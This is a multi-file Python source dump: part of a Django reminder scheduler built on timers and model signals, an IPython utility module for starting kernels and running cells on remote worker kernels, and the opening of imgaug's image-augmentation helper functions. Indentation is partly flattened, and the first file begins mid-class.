_, message, method_type, user_id = UserAlertScheduler._get_args(reminder)
functions = UserAlertScheduler._get_function(method_type)
UserAlertScheduler.__current_reminder = reminder
# start a new daemon thread for setting the current timer with the new reminder arguments
if UserAlertScheduler.__current_timer is not None and UserAlertScheduler.__current_timer.is_alive():
UserAlertScheduler.__current_timer.cancel()
Thread(target=UserAlertScheduler.__create_timer, args=(functions, message, user_id), daemon=True).start()
UserAlertScheduler.__logger.debug((
"new Timer has been started. ",
f"message: {message} - {user_id} - {UserAlertScheduler.__current_reminder.date_time}"
))
@staticmethod
def __create_timer(functions, message, user_id):
""" create the timer object.
The scheduler needs a timer object that will go off when a specific time has been reached
"Timer" is a class defined in Python's own threading library that gets a time and a method to invoke.
This function set the current timer to be a new timer object with
time: the difference of the reminder time and the current time
target: the function given using the _get_function class
args: the argument that the function gets, a message and the user_id object
** this function is run using a different thread because the timer itself
can cause a few problems with the migrate and the current thread running it.
"""
UserAlertScheduler.__current_timer = Timer(
UserAlertScheduler.__get_time_difference(UserAlertScheduler.__current_reminder.date_time),
UserAlertScheduler.__alert_user,
args=(functions, message, user_id)
)
UserAlertScheduler.__current_timer.start() # start the timer object
@staticmethod
def __remove_alert(reminder_id):
""" remove the reminder with a reminder_id from the queue.
The scheduler will check if the reminder given is the current reminder
if so the scheduler will remove it and the current timer,
and will set a new reminder with its own timer according to the add_alert function
"""
UserAlertScheduler.__logger.info("in remove alert")
if UserAlertScheduler.__current_reminder:
if UserAlertScheduler.__current_reminder.id == reminder_id:
if UserAlertScheduler.__current_timer:
if UserAlertScheduler.__current_timer.is_alive(): # check if the timer is still running
UserAlertScheduler.__current_timer.cancel()
UserAlertScheduler.__current_reminder = None
UserAlertScheduler.__current_timer = None
UserAlertScheduler.__logger.debug(
f"removed the current reminder. last reminder: {Reminder.objects.get(id=reminder_id)}"
)
else:
UserAlertScheduler.__logger.warning(
(f"the reminder {UserAlertScheduler.__current_reminder}"
" is the current reminder but has no timer")
)
@staticmethod
def __modifie_alert(reminder):
""" modifie the reminder in the queue.
The scheduler will check if the given reminder is the current reminder object
if so the scheduler will check if the time has been changed,
if the time has been increased then the scheduler will try to add a new reminder instead
otherwise, the remainder will be changed in the scheduler to the reminder object given
"""
UserAlertScheduler.__logger.info("in modifie alert")
if reminder != UserAlertScheduler.__current_reminder:
UserAlertScheduler.__logger.debug(
f"The two reminders are not the same.\n{UserAlertScheduler.__current_reminder} vs {reminder}"
)
next_reminder = None
if reminder.date_time < UserAlertScheduler.__current_reminder.date_time:
next_reminder = reminder
UserAlertScheduler.__logger.debug(f"a new reminder is added: {next_reminder}")
else:
UserAlertScheduler.__current_reminder = reminder
UserAlertScheduler.__logger.debug(f"the current reminder has been modified: {reminder}")
print(f"the current reminder has been modified: {reminder}")
@staticmethod
def __alert_user(methods, *args, **kwargs):
""" alert the user when the time of the reminder has been reached.
methods: the functions to invoke
other arguments: such as message and user_id """
UserAlertScheduler.__logger.info("in alert user")
UserAlertScheduler.__logger.debug("starting to loop over all the functions")
UserAlertScheduler.__logger.debug(f"args: {args} || kwargs: {kwargs}")
for method in methods:
method(*args, **kwargs)
# Potential Send Signal - a signal can be sent for alerting that the timer has ended
UserAlertScheduler.__logger.debug("deleting the current task from the DB.")
# remove the current reminder from the db
current_reminder_instance = Reminder.objects.get(id=UserAlertScheduler.__current_reminder.id)
if current_reminder_instance:
current_reminder_instance.delete()
@staticmethod
@receiver(post_save, sender=Reminder)
def __check_after_saving(sender, instance, **kwargs):
""" add a new alert.
The scheduler will check if the current reminder object has been set
- if not then the scheduler will call add an alert
- otherwise the instance (reminder) will be checked if it is the current reminder
if so the user has changed something in the reminder as a result the scheduler
will call modify alert instead.
** this is a function that implements the signal post save
as a result this function takes the arguments sender, instance, **kwargs exactly
without change in the names or order of the variables,
any changes can cause an exception.
"""
UserAlertScheduler.__logger.info("in check after saving")
UserAlertScheduler.__logger.debug("post save")
UserAlertScheduler.__logger.debug(f"instance: {instance}")
if UserAlertScheduler.__current_reminder:
if UserAlertScheduler.__current_reminder.id == instance.id:
UserAlertScheduler.__logger.debug(
f"the reminder has been changed: {UserAlertScheduler.__current_reminder} vs {instance}"
)
UserAlertScheduler.__modifie_alert(instance)
elif UserAlertScheduler.__current_reminder.date_time < instance.date_time:
UserAlertScheduler.__logger.debug("end post: the timer time hasn't been changed")
return None
UserAlertScheduler.__logger.debug(f"set new alert: {instance}")
UserAlertScheduler.__add_alert(instance)
@staticmethod
@receiver(pre_delete, sender=Reminder)
def __check_before_delete(sender, instance, **kwargs):
""" remove the alert from the queue.
The scheduler will call remove alert to check if the instance (reminder)
is in fact the current reminder, and will schedule a new reminder if need be.
** this is a function that implements the signal pre delete
as a result this function takes the arguments sender, instance, **kwargs exactly
without change in the names or order of the variables,
any changes can cause an exception.
"""
UserAlertScheduler.__logger.info("in check before delete")
UserAlertScheduler.__logger.debug("pre delete")
UserAlertScheduler.__logger.debug(f"removing the reminder: {instance}")
UserAlertScheduler.__remove_alert(instance.id)
@staticmethod
@receiver(post_delete, sender=Reminder)
def __check_after_delete(sender, instance, **kwargs):
""" set a new reminder if the current reminder is None
The scheduler delete each reminder at the end of his time
as a result a pre delete signal is being called, the scheduler check
that the reminder is the current reminder and set it to None
Then the post delete signal is called and the scheduler will schedule a new reminder
after the deletion of the last reminder.
** this is a function that implements the signal pre save
as a result this function takes the arguments sender, instance, **kwargs exactly
without change in the names or order of the variables,
any changes can cause an exception.
"""
UserAlertScheduler.__logger.info("in check after delete")
UserAlertScheduler.__logger.debug("post delete")
if not UserAlertScheduler.__current_reminder:
UserAlertScheduler.__logger.debug(
"current task and current timer are None, the last reminder has been deleted."
)
UserAlertScheduler.__logger.debug("search a new reminder to insert")
UserAlertScheduler.__add_alert()
|
_ipython_utils.py
|
"""Utilities for integrating with IPython
These functions should probably reside in Jupyter and IPython repositories,
after which we can import them instead of having our own definitions.
"""
from __future__ import print_function
import atexit
import os
try:
import queue
except ImportError:
# Python 2
import Queue as queue
from subprocess import Popen
import sys
from threading import Thread
from uuid import uuid4
from tornado.gen import TimeoutError
from tornado.ioloop import IOLoop
from threading import Event
from IPython import get_ipython
from jupyter_client import BlockingKernelClient, write_connection_file
from jupyter_core.paths import jupyter_runtime_dir
OUTPUT_TIMEOUT = 10
def run_cell_remote(ip, kc, cell):
"""Run a cell on a KernelClient
Any output from the cell will be redisplayed in the local session.
"""
msg_id = kc.execute(cell)
in_kernel = getattr(ip, "kernel", False)
if in_kernel:
socket = ip.display_pub.pub_socket
session = ip.display_pub.session
parent_header = ip.display_pub.parent_header
while True:
try:
msg = kc.get_iopub_msg(timeout=OUTPUT_TIMEOUT)
except queue.Empty:
raise TimeoutError("Timeout waiting for IPython output")
if msg["parent_header"].get("msg_id") != msg_id:
continue
msg_type = msg["header"]["msg_type"]
content = msg["content"]
if msg_type == "status":
if content["execution_state"] == "idle":
# idle means output is done
break
elif msg_type == "stream":
stream = getattr(sys, content["name"])
stream.write(content["text"])
elif msg_type in ("display_data", "execute_result", "error"):
if in_kernel:
session.send(socket, msg_type, content, parent=parent_header)
else:
if msg_type == "error":
print("\n".join(content["traceback"]), file=sys.stderr)
else:
sys.stdout.write(content["data"].get("text/plain", ""))
else:
pass
def register_worker_magic(connection_info, magic_name="worker"):
"""Register a %worker magic, given connection_info.
Both a line and cell magic are registered,
which run the given cell in a remote kernel.
"""
ip = get_ipython()
info = dict(connection_info) # copy
key = info.pop("key")
    kc = BlockingKernelClient(**info)
kc.session.key = key
kc.start_channels()
def remote(line, cell=None):
"""Run the current cell on a remote IPython kernel"""
if cell is None:
# both line and cell magic
cell = line
run_cell_remote(ip, kc, cell)
remote.client = kc # preserve reference on kc, largely for mocking
ip.register_magic_function(remote, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote, magic_kind="cell", magic_name=magic_name)
def remote_magic(line, cell=None):
"""A magic for running code on a specified remote worker
The connection_info dict of the worker will be looked up
as the first positional arg to the magic.
The rest of the line (or the entire cell for a %%cell magic)
will be passed to the remote kernel.
Usage:
info = e.start_ipython(worker)[worker]
%remote info print(worker.data)
"""
# get connection info from IPython's user namespace
ip = get_ipython()
split_line = line.split(None, 1)
info_name = split_line[0]
if info_name not in ip.user_ns:
raise NameError(info_name)
connection_info = dict(ip.user_ns[info_name])
if not cell: # line magic, use the rest of the line
if len(split_line) == 1:
raise ValueError("I need some code to run!")
cell = split_line[1]
# turn info dict to hashable str for use as lookup key in _clients cache
key = ",".join(map(str, sorted(connection_info.items())))
session_key = connection_info.pop("key")
if key in remote_magic._clients:
kc = remote_magic._clients[key]
else:
kc = BlockingKernelClient(**connection_info)
kc.session.key = session_key
kc.start_channels()
kc.wait_for_ready(timeout=10)
remote_magic._clients[key] = kc
# actually run the code
run_cell_remote(ip, kc, cell)
# cache clients for re-use in remote magic
remote_magic._clients = {}
def register_remote_magic(magic_name="remote"):
"""Define the parameterized %remote magic
See remote_magic above for details.
"""
ip = get_ipython()
if ip is None:
return # do nothing if IPython's not running
ip.register_magic_function(remote_magic, magic_kind="line", magic_name=magic_name)
ip.register_magic_function(remote_magic, magic_kind="cell", magic_name=magic_name)
def connect_qtconsole(connection_info, name=None, extra_args=None):
"""Open a QtConsole connected to a worker who has the given future
- identify worker with who_has
- start IPython kernel on the worker
- start qtconsole connected to the kernel
"""
runtime_dir = jupyter_runtime_dir()
if name is None:
name = uuid4().hex
path = os.path.join(runtime_dir, name + ".json")
write_connection_file(path, **connection_info)
cmd = ["jupyter", "qtconsole", "--existing", path]
if extra_args:
cmd.extend(extra_args)
Popen(cmd)
@atexit.register
def _cleanup_connection_file():
"""Cleanup our connection file when we exit."""
try:
os.remove(path)
except OSError:
pass
def start_ipython(ip=None, ns=None, log=None):
"""Start an IPython kernel in a thread
Parameters
----------
ip: str
The IP address to listen on (likely the parent object's ip).
ns: dict
Any names that should be injected into the IPython namespace.
log: logger instance
Hook up IPython's logging to an existing logger instead of the default.
"""
from IPython import get_ipython
if get_ipython() is not None:
raise RuntimeError("Cannot start IPython, it's already running.")
from zmq.eventloop.ioloop import ZMQIOLoop
from ipykernel.kernelapp import IPKernelApp
# save the global IOLoop instance
# since IPython relies on it, but we are going to put it in a thread.
save_inst = IOLoop.instance()
IOLoop.clear_instance()
zmq_loop = ZMQIOLoop()
zmq_loop.install()
# start IPython, disabling its signal handlers that won't work due to running in a thread:
app = IPKernelApp.instance(log=log)
# Don't connect to the history database
app.config.HistoryManager.hist_file = ":memory:"
# listen on all interfaces, so remote clients can connect:
if ip:
app.ip = ip
# disable some signal handling, logging
def noop():
return None
app.init_signal = noop
app.log_connection_info = noop
# start IPython in a thread
# initialization happens in the thread to avoid threading problems
# with the sqlite history
evt = Event()
def _start():
app.initialize([])
app.kernel.pre_handler_hook = noop
app.kernel.post_handler_hook = noop
app.kernel.start()
app.kernel.loop = IOLoop.instance()
# save self in the IPython namespace as 'worker'
# inject things into the IPython namespace
if ns:
app.kernel.shell.user_ns.update(ns)
evt.set()
zmq_loop.start()
zmq_loop_thread = Thread(target=_start)
zmq_loop_thread.daemon = True
zmq_loop_thread.start()
assert evt.wait(timeout=5), "IPython didn't start in a reasonable amount of time."
# put the global IOLoop instance back:
IOLoop.clear_instance()
save_inst.install()
return app
|
imgaug.py
|
from __future__ import print_function, division, absolute_import
import random
import numpy as np
import copy
import numbers
import cv2
import math
from scipy import misc, ndimage
import multiprocessing
import threading
import sys
import six
import six.moves as sm
import os
from skimage import draw
if sys.version_info[0] == 2:
import cPickle as pickle
from Queue import Empty as QueueEmpty
elif sys.version_info[0] == 3:
import pickle
from queue import Empty as QueueEmpty
xrange = range
ALL = "ALL"
# filepath to the quokka image
QUOKKA_FP = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"quokka.jpg"
)
DEFAULT_FONT_FP = os.path.join(
os.path.dirname(os.path.abspath(__file__)),
"DejaVuSans.ttf"
)
# We instantiate a current/global random state here once.
# One can also call np.random, but that is (in contrast to np.random.RandomState)
# a module and hence cannot be copied via deepcopy. That's why we use RandomState
# here (and in all augmenters) instead of np.random.
CURRENT_RANDOM_STATE = np.random.RandomState(42)
def is_np_array(val):
"""
Checks whether a variable is a numpy array.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a numpy array. Otherwise False.
"""
# using np.generic here seems to also fire for scalar numpy values even
# though those are not arrays
#return isinstance(val, (np.ndarray, np.generic))
return isinstance(val, np.ndarray)
def is_single_integer(val):
"""
Checks whether a variable is an integer.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is an integer. Otherwise False.
"""
return isinstance(val, numbers.Integral)
def is_single_float(val):
"""
Checks whether a variable is a float.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a float. Otherwise False.
"""
return isinstance(val, numbers.Real) and not is_single_integer(val)
def is_single_number(val):
"""
Checks whether a variable is a number, i.e. an integer or float.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a number. Otherwise False.
"""
return is_single_integer(val) or is_single_float(val)
def is_iterable(val):
"""
Checks whether a variable is iterable.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is an iterable. Otherwise False.
"""
# TODO make this more abstract, not just restricted to tuple/list
return isinstance(val, (tuple, list))
# TODO convert to is_single_string() or rename is_single_integer/float/number()
def is_string(val):
"""
Checks whether a variable is a string.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a string. Otherwise False.
"""
return isinstance(val, six.string_types)
def is_integer_array(val):
"""
Checks whether a variable is a numpy integer array.
Parameters
----------
val : anything
The variable to
check.
Returns
-------
out : bool
True if the variable is a numpy integer array. Otherwise False.
"""
return is_np_array(val) and issubclass(val.dtype.type, np.integer)
def is_callable(val):
"""
Checks whether a variable is a callable, e.g. a function.
Parameters
----------
    val : anything
        The variable to check.
Returns
-------
out : bool
True if the variable is a callable. Otherwise False.
"""
# python 3.x with x <= 2 does not support callable(), apparently
if sys.version_info[0] == 3 and sys.version_info[1] <= 2:
return hasattr(val, '__call__')
else:
return callable(val)
def seed(seedval):
"""
Set the seed used by the global random state and thereby all randomness
in the library.
    This random state is used by default by all augmenters. Under special
circumstances (e.g. when an augmenter is switched to deterministic mode),
the global random state is replaced by another -- local -- one.
The replacement is dependent on the global random state.
Parameters
----------
    seedval : int
        The seed to use.
"""
CURRENT_RANDOM_STATE.seed(seedval)
def current_random_state():
"""
Returns the current/global random state of the library.
Returns
    -------
out : np.random.RandomState
The current/global random state.
"""
return CURRENT_RANDOM_STATE
def new_random_state(seed=None, fully_random=False):
"""
Returns a new random state.
Parameters
----------
seed : None or int, optional(default=None)
Optional seed value to use.
The same datatypes are allowed as for np.random.RandomState(seed).
fully_random : bool, optional(default=False)
Whether to use numpy's random initialization for the
RandomState (used if set to True). If False, a seed is sampled from
the global random state, which is a bit faster and hence the default.
Returns
-------
out : np.random.RandomState
The new random state.
"""
if seed is None:
if not fully_random:
            # sample a seed manually instead of calling RandomState()
            # without arguments, because the latter is way slower
seed = CURRENT_RANDOM_STATE.randint(0, 10**6, 1)[0]
return np.random.RandomState(seed)
def dummy_random_state():
"""
Returns a dummy random state that is always based on a seed of 1.
Returns
-------
out : np.random.RandomState
The new random state.
"""
return np.random.RandomState(1)
def copy_random_state(random_state, force_copy=False):
"""
Creates a copy of a random state.
Parameters
----------
    random_state : np.random.RandomState
        The random state to copy.
force_copy : bool, optional(default=False)
If True, this function will always create a copy of every random
state. If False, it will not copy numpy's default random state,
but all other random states.
Returns
-------
rs_copy : np.random.RandomState
The copied random state.
"""
if random_state == np.random and not force_copy:
return random_state
else:
rs_copy = dummy_random_state()
orig_state = random_state.get_state()
rs_copy.set_state(orig_state)
return rs_copy
def derive_random_state(random_state):
return derive_random_states(random_state, n=1)[0]
# TODO use this everywhere instead of manual seed + create
def derive_random_states(random_state, n=1):
seed = random_state.randint(0, 10**6, 1)[0]
return [new_random_state(seed+i) for i in sm.xrange(n)]
def forward_random_state(random_state):
random_state.uniform()
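# Illustrative sketch (not part of the original module): how the random state
# helpers above are typically combined to get reproducible randomness. The
# function name _example_reproducible_random_states is hypothetical.
def _example_reproducible_random_states():
    seed(1)  # make the global random state deterministic
    rs = new_random_state()  # seeded from the (now deterministic) global state
    child_a, child_b = derive_random_states(rs, n=2)
    # repeating this function yields the same values, because everything is
    # derived from the globally seeded state
    return child_a.randint(0, 100), child_b.randint(0, 100)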
# TODO
# def from_json(json_str):
# pass
def quokka(size=None):
"""
Returns an image of a quokka as a numpy array.
Parameters
----------
size : None or float or tuple of two ints, optional(default=None)
Size of the output image. Input into scipy.misc.imresize.
Usually expected to be a tuple (H, W), where H is the desired height
and W is the width. If None, then the image will not be resized.
Returns
-------
img : (H,W,3) ndarray
The image array of dtype uint8.
"""
img = ndimage.imread(QUOKKA_FP, mode="RGB")
if size is not None:
img = misc.imresize(img, size)
return img
def quokka_square(size=None):
"""
    Returns a (square) image of a quokka as a numpy array.
Parameters
----------
size : None or float or tuple of two ints, optional(default=None)
Size of the output image. Input into scipy.misc.imresize.
Usually expected to be a tuple (H, W), where H is the desired height
and W is the width. If None, then the image will not be resized.
Returns
-------
img : (H,W,3) ndarray
The image array of dtype uint8.
"""
img = ndimage.imread(QUOKKA_FP, mode="RGB")
img = img[0:643, 0:643]
if size is not None:
img = misc.imresize(img, size)
return img
def angle_between_vectors(v1, v2):
"""
Returns the angle in radians between vectors 'v1' and 'v2'.
From http://stackoverflow.com/questions/2827393/angles-between-two-n-dimensional-vectors-in-python
Parameters
----------
    {v1, v2} : (N,) ndarray
        Input vectors.
Returns
-------
out : float
Angle in radians.
Examples
--------
    >>> angle_between_vectors(np.float32([1, 0, 0]), np.float32([0, 1, 0]))
    1.5707963267948966
    >>> angle_between_vectors(np.float32([1, 0, 0]), np.float32([1, 0, 0]))
    0.0
    >>> angle_between_vectors(np.float32([1, 0, 0]), np.float32([-1, 0, 0]))
    3.141592653589793
"""
v1_u = v1 / np.linalg.norm(v1)
v2_u = v2 / np.linalg.norm(v2)
return np.arccos(np.clip(np.dot(v1_u, v2_u), -1.0, 1.0))
def draw_text(img, y, x, text, color=[0, 255, 0], size=25): # pylint: disable=locally-disabled, dangerous-default-value, line-too-long
"""
Draw text on an image.
    By default, this uses DejaVuSans as its font, which is included in the
library.
Parameters
----------
img : (H,W,3) ndarray
The image array to draw text on.
Expected to be of dtype uint8 or float32 (value range 0.0 to 255.0).
    {y, x} : int
        x- and y-coordinate of the top left corner of the text.
color : iterable of 3 ints, optional(default=[0, 255, 0])
Color of the text to draw. For RGB-images this is expected to be
an RGB color.
    size : int, optional(default=25)
        Font size of the text to draw.
Returns
-------
img_np : (H,W,3) ndarray
Input image with text drawn on it.
"""
# keeping PIL here so that it is not a dependency of the library right now
from PIL import Image, ImageDraw, ImageFont
do_assert(img.dtype in [np.uint8, np.float32])
input_dtype = img.dtype
if img.dtype == np.float32:
img = img.astype(np.uint8)
for i in range(len(color)):
val = color[i]
if isinstance(val, float):
val = int(val * 255)
val = np.clip(val, 0, 255)
color[i] = val
img = Image.fromarray(img)
font = ImageFont.truetype(DEFAULT_FONT_FP, size)
context = ImageDraw.Draw(img)
context.text((x, y), text, fill=tuple(color), font=font)
img_np = np.asarray(img)
img_np.setflags(write=True) # PIL/asarray returns read only array
if img_np.dtype != input_dtype:
img_np = img_np.astype(input_dtype)
return img_np
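# Illustrative sketch (not part of the original module): drawing a label onto a
# blank uint8 image with draw_text(). The canvas and label are hypothetical.
def _example_draw_text():
    canvas = np.zeros((64, 128, 3), dtype=np.uint8)
    labeled = draw_text(canvas, y=10, x=10, text="quokka",
                        color=[255, 255, 255], size=20)
    return labeled  # same shape as the canvas, with white text drawn on it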
def imresize_many_images(images, sizes=None, interpolation=None):
"""
Resize many images to a specified size.
Parameters
----------
images : (N,H,W,C) ndarray
Array of the images to resize.
Expected to usually be of dtype uint8.
    sizes : iterable of two ints
        The new size in (height, width) format.
interpolation : None or string or int, optional(default=None)
The interpolation to use during resize.
If int, then expected to be one of:
* cv2.INTER_NEAREST (nearest neighbour interpolation)
* cv2.INTER_LINEAR (linear interpolation)
* cv2.INTER_AREA (area interpolation)
* cv2.INTER_CUBIC (cubic interpolation)
If string, then expected to be one of:
* "nearest" (identical to cv2.INTER_NEAREST)
* "linear" (identical to cv2.INTER_LINEAR)
* "area" (identical to cv2.INTER_AREA)
* "cubic" (identical to cv2.INTER_CUBIC)
If None, the interpolation will be chosen automatically. For size
increases, area interpolation will be picked and for size decreases,
linear interpolation will be picked.
Returns
-------
result : (N,H',W',C) ndarray
Array of the resized images.
"""
s = images.shape
do_assert(len(s) == 4, s)
nb_images = s[0]
im_height, im_width = s[1], s[2]
nb_channels = s[3]
height, width = sizes[0], sizes[1]
if height == im_height and width == im_width:
return np.copy(images)
ip = interpolation
do_assert(ip is None or ip in ["nearest", "linear", "area", "cubic", cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_AREA, cv2.INTER_CUBIC])
if ip is None:
if height > im_height or width > im_width:
ip = cv2.INTER_AREA
else:
ip = cv2.INTER_LINEAR
elif ip in ["nearest", cv2.INTER_NEAREST]:
ip = cv2.INTER_NEAREST
elif ip in ["linear", cv2.INTER_LINEAR]:
ip = cv2.INTER_LINEAR
elif ip in ["area", cv2.INTER_AREA]:
ip = cv2.INTER_AREA
elif ip in ["cubic", cv2.INTER_CUBIC]:
ip = cv2.INTER_CUBIC
else:
raise Exception("Invalid interpolation order")
result = np.zeros((nb_images, height, width, nb_channels), dtype=np.uint8)
for img_idx in sm.xrange(nb_images):
# TODO fallback to scipy here if image isn't uint8
result_img = cv2.resize(images[img_idx], (width, height), interpolation=ip)
if len(result_img.shape) == 2:
result_img = result_img[:, :, np.newaxis]
result[img_idx] = result_img
return result
def imresize_single_image(image, sizes, interpolation=None):
"""
Resizes a single image.
Parameters
----------
image : (H,W,C) ndarray or (H,W) ndarray
Array of the image to resize.
Expected to usually be of dtype uint8.
sizes : iterable of two ints
See `imresize_many_images()`.
interpolation : None or string or int, optional(default=None)
See `imresize_many_images()`.
Returns
-------
out : (H',W',C) ndarray or (H',W') ndarray
The resized image.
"""
grayscale = False
if image.ndim == 2:
grayscale = True
image = image[:, :, np.newaxis]
do_assert(len(image.shape) == 3, image.shape)
rs = imresize_many_images(image[np.newaxis, :, :, :], sizes, interpolation=interpolation)
if grayscale:
return np.squeeze(rs[0, :, :, 0])
else:
return rs[0, ...]
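# Illustrative sketch (not part of the original module): resizing a single image
# and a whole batch with the two helpers above. The shapes are hypothetical.
def _example_imresize():
    image = np.zeros((32, 64, 3), dtype=np.uint8)
    batch = np.zeros((4, 32, 64, 3), dtype=np.uint8)
    image_large = imresize_single_image(image, (64, 128), interpolation="cubic")
    batch_small = imresize_many_images(batch, (16, 32))  # interpolation picked automatically
    return image_large.shape, batch_small.shape  # (64, 128, 3) and (4, 16, 32, 3)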
def draw_grid(images, rows=None, cols=None):
"""
Converts multiple input images into a single image showing them in a grid.
Parameters
----------
images : (N,H,W,3) ndarray or iterable of (H,W,3) array
The input images to convert to a grid.
Expected to be RGB and have dtype uint8.
rows : None or int, optional(default=None)
The number of rows to show in the grid.
If None, it will be automatically derived.
cols : None or int, optional(default=None)
The number of cols to show in the grid.
If None, it will be automatically derived.
Returns
-------
grid : (H',W',3) ndarray
Image of the generated grid.
"""
if is_np_array(images):
do_assert(images.ndim == 4)
else:
do_assert(is_iterable(images) and is_np_array(images[0]) and images[0].ndim == 3)
nb_images = len(images)
do_assert(nb_images > 0)
cell_height = max([image.shape[0] for image in images])
cell_width = max([image.shape[1] for image in images])
channels = set([image.shape[2] for image in images])
do_assert(len(channels) == 1, "All images are expected to have the same number of channels, but got channel set %s with length %d instead." % (str(channels), len(channels)))
nb_channels = list(channels)[0]
if rows is None and cols is None:
rows = cols = int(math.ceil(math.sqrt(nb_images)))
elif rows is not None:
cols = int(math.ceil(nb_images / rows))
elif cols is not None:
rows = int(math.ceil(nb_images / cols))
do_assert(rows * cols >= nb_images)
width = cell_width * cols
height = cell_height * rows
grid = np.zeros((height, width, nb_channels), dtype=np.uint8)
cell_idx = 0
for row_idx in sm.xrange(rows):
for col_idx in sm.xrange(cols):
if cell_idx < nb_images:
image = images[cell_idx]
cell_y1 = cell_height * row_idx
cell_y2 = cell_y1 + image.shape[0]
cell_x1 = cell_width * col_idx
cell_x2 = cell_x1 + image.shape[1]
grid[cell_y1:cell_y2, cell_x1:cell_x2, :] = image
cell_idx += 1
return grid
def show_grid(images, rows=None, cols=None):
"""
Converts the input images to a grid image and shows it in a new window.
This function wraps around scipy.misc.imshow(), which requires the
`see <image>` command to work. On Windows systems, this tends to not be
the case.
Parameters
----------
images : (N,H,W,3) ndarray or iterable of (H,W,3) array
See `draw_grid()`.
rows : None or int, optional(default=None)
See `draw_grid()`.
cols : None or int, optional(default=None)
See `draw_grid()`.
"""
grid = draw_grid(images, rows=rows, cols=cols)
misc.imshow(grid)
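# Illustrative sketch (not part of the original module): arranging four blank
# images into a 2x2 grid with draw_grid(). The input images are hypothetical.
def _example_draw_grid():
    images = [np.zeros((32, 32, 3), dtype=np.uint8) for _ in range(4)]
    grid = draw_grid(images, rows=2, cols=2)
    return grid.shape  # (64, 64, 3)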
def do_assert(condition, message="Assertion failed."):
"""
    Function that behaves like an `assert` statement, but raises an
    Exception.
This is added because `assert` statements are removed in optimized code.
It replaces `assert` statements throughout the library that should be
kept even in optimized code.
Parameters
----------
condition : bool
If False, an exception is raised.
message : string, optional(default="Assertion failed.")
Error message.
"""
if not condition:
raise AssertionError(str(message))
class HooksImages(object):
"""
Class to intervene with image augmentation runs.
This is e.g. useful to dynamically deactivate some augmenters.
Parameters
----------
activator : None or callable, optional(default=None)
A function that gives permission to execute an augmenter.
The expected interface is
`f(images, augmenter, parents, default)`,
where `images` are the input images to augment, `augmenter` is the
instance of the augmenter to execute, `parents` are previously
executed augmenters and `default` is an expected default value to be
returned if the activator function does not plan to make a decision
for the given inputs.
propagator : None or callable, optional(default=None)
A function that gives permission to propagate the augmentation further
to the children of an augmenter. This happens after the activator.
In theory, an augmenter may augment images itself (if allowed by the
activator) and then execute child augmenters afterwards (if allowed by
the propagator). If the activator returned False, the propagation step
will never be executed.
The expected interface is
`f(images, augmenter, parents, default)`,
with all arguments having identical meaning to the activator.
preprocessor : None or callable, optional(default=None)
A function to call before an augmenter performed any augmentations.
The interface is
`f(images, augmenter, parents)`,
with all arguments having identical meaning to the activator.
It is expected to return the input images, optionally modified.
postprocessor : None or callable, optional(default=None)
A function to call after an augmenter performed augmentations.
The interface is the same as for the preprocessor.
Examples
--------
>>> seq = iaa.Sequential([
>>> iaa.GaussianBlur(3.0, name="blur"),
>>> iaa.Dropout(0.05, name="dropout"),
>>> iaa.Affine(translate_px=-5, name="affine")
>>> ])
>>>
>>> def activator(images, augmenter, parents, default):
>>> return False if augmenter.name in ["blur", "dropout"] else default
>>>
>>> seq_det = seq.to_deterministic()
>>> images_aug = seq_det.augment_images(images)
>>> heatmaps_aug = seq_det.augment_images(
>>> heatmaps,
>>> hooks=ia.HooksImages(activator=activator)
>>> )
This augments images and their respective heatmaps in the same way.
The heatmaps however are only modified by Affine, not by GaussianBlur or
Dropout.
"""
def __init__(self, activator=None, propagator=None, preprocessor=None, postprocessor=None):
self.activator = activator
self.propagator = propagator
self.preprocessor = preprocessor
self.postprocessor = postprocessor
def is_activated(self, images, augmenter, parents, default):
"""
Returns whether an augmenter may be executed.
Returns
-------
out : bool
If True, the augmenter may be executed. If False, it may
not be executed.
"""
if self.activator is None:
return default
else:
return self.activator(images, augmenter, parents, default)
# TODO is a propagating hook necessary? seems to be covered by activated
# hook already
def is_propagating(self, images, augmenter, parents, default):
"""
        Returns whether an augmenter may call its children to augment an
        image. This is independent of the augmenter itself possibly changing
        the image without calling its children. (Most (all?) augmenters with
        children currently don't perform any changes themselves.)
Returns
-------
out : bool
            If True, the augmenter may propagate to its children.
If False, it may not.
"""
if self.propagator is None:
return default
else:
return self.propagator(images, augmenter, parents, default)
def preprocess(self, images, augmenter, parents):
"""
A function to be called before the augmentation of images starts (per
augmenter).
Returns
-------
out : (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The input images, optionally modified.
"""
if self.preprocessor is None:
return images
else:
return self.preprocessor(images, augmenter, parents)
def postprocess(self, images, augmenter, parents):
"""
A function to be called after the augmentation of images was
performed.
Returns
-------
out : (N,H,W,C) ndarray or (N,H,W) ndarray or list of (H,W,C) ndarray or list of (H,W) ndarray
The input images, optionally modified.
"""
if self.postprocessor is None:
return images
else:
return self.postprocessor(images, augmenter, parents)
class HooksKeypoints(HooksImages):
"""
Class to intervene with keypoint augmentation runs.
This is e.g. useful to dynamically deactivate some augmenters.
This class is currently the same as the one for images. This may or may
not change in the future.
"""
pass
class Keypoint(object):
"""
A single keypoint (aka landmark) on an image.
Parameters
----------
x : number
Coordinate of the keypoint on the x axis.
y : number
Coordinate of the keypoint on the y axis.
"""
def __init__(self, x, y):
# these checks are currently removed because they are very slow for some
# reason
#assert is_single_integer(x), type(x)
#assert is_single_integer(y), type(y)
self.x = x
self.y = y
@property
def x_int(self):
return int(round(self.x))
@property
def y_int(self):
return int(round(self.y))
def project(self, from_shape, to_shape):
"""
Project the keypoint onto a new position on a new image.
E.g. if the keypoint is on its original image at x=(10 of 100 pixels)
and y=(20 of 100 pixels) and is projected onto a new image with
size (width=200, height=200), its new position will be (20, 40).
This is intended for cases where the original image is resized.
It cannot be used for more complex changes (e.g. padding, cropping).
Parameters
----------
from_shape : tuple
Shape of the original image. (Before resize.)
to_shape : tuple
Shape of the new image. (After resize.)
Returns
-------
out : Keypoint
